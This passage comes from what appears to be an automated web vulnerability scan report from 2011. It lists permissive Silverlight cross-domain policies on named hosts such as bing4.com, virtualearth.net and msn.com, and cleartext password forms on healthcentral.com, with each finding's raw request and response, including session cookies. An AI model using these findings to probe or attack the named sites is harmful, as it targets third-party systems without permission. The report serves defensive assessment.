<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Wed, 20 Jul 2011 01:58:26 GMT
Date: Tue, 19 Jul 2011 01:58:26 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.3. http://c.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...

4.4. http://c.scout.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.scout.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 12:04:45 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...

4.5. http://dev.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:11:01 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

4.6. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 430187
Date: Tue, 19 Jul 2011 12:09:28 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 12:39:41 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.7. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 418392
Date: Tue, 19 Jul 2011 12:09:28 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 15:56:16 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.8. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 426398
Date: Tue, 19 Jul 2011 12:09:26 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 13:42:48 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.9. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 421787
Date: Tue, 19 Jul 2011 12:09:26 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 14:59:39 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.10. http://img1.catalog.video.msn.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:35 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

4.11. http://img2.catalog.video.msn.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img2.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:35 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

4.12. http://img3.catalog.video.msn.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:33 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

4.13. http://img4.catalog.video.msn.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img4.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:34 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

4.14. http://minerva.healthcentral.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://minerva.healthcentral.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: minerva.healthcentral.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Omniture DC/2.0.0
xserver: www618
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.15. http://t0.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t0.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: t0.tiles.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Content-Length: 458

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.16. http://a1.bing4.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a1.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a1.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:11:03 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=010A9B912128428D9CC0A0CA58307B38; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=4F2C78F6A846443C838C5F5B8F68F756; expires=Thu, 18-Jul-2013 12:11:03 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:11:03 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.17. http://a2.bing4.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a2.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a2.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:11:03 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=D2310D8AF19D43B7AD6FFE0BB6937BF7; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=BF71C6B6773A407FB9A0454069AB43B7; expires=Thu, 18-Jul-2013 12:11:03 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:11:03 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.18. http://a4.bing4.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a4.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a4.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:11:03 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=E569119BEA404A6CAF50CA8FDABB1C08; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=EFDD1930A12645738E8ABD33EE8480A8; expires=Thu, 18-Jul-2013 12:11:03 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:11:03 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.19. http://ts1.mm.bing.net/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:09:24 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.20. http://ts2.mm.bing.net/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.21. http://ts3.mm.bing.net/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts3.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts3.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.22. http://ts4.mm.bing.net/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts4.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts4.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

5. Cleartext submission of password

There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/ HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; CONCRETE5=7e3f03933c1bb0d06b1d5726e207837d; c_search=_search; s_cc=true; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:58:54 GMT
Date: Tue, 19 Jul 2011 01:58:54 GMT
Content-Length: 36637
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Feeling Low Self-Worth - Common Symptoms of ADD & ADHD in Women - ADHD</titl
...[SNIP]...
</div>
<form onsubmit="new Ajax.Request('/adhd/c/login', {asynchronous:true, evalScripts:true, method:'post', parameters:Form.serialize(this)}); return false;" method="post" action="#">
<div class="text">
...[SNIP]...
</label><input type="password" tabindex="101" size="30" name="user[password]" id="mini_home_user_password">
</div>
...[SNIP]...

5.2. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825 HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://paid.outbrain.com/network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
